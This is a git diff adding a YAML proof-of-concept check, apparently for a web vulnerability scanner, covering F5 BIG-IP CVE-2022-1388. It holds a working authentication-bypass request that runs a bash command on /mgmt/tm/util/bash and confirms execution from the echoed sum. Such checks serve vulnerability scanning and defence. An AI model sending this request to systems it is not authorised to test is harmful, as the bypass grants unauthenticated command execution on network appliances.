diff --git a/WebScan/pocs/f5-cve-2022-1388.yml b/WebScan/pocs/f5-cve-2022-1388.yml
new file mode 100644
index 0000000..8eada04
--- /dev/null
+++ b/WebScan/pocs/f5-cve-2022-1388.yml
@@ -0,0 +1,21 @@
+name: poc-yaml-f5-cve-2022-1388
+set:
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
+rules:
+  - method: POST
+    path: /mgmt/tm/util/bash
+    headers:
+      Content-Type: application/json
+      Connection: keep-alive, x-F5-Auth-Token
+      X-F5-Auth-Token: a
+      Authorization: Basic YWRtaW46
+    body: >-
+      {"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
+detail:
+  author: jindaxia
+  links:
+    - https://support.f5.com/csp/article/K23605346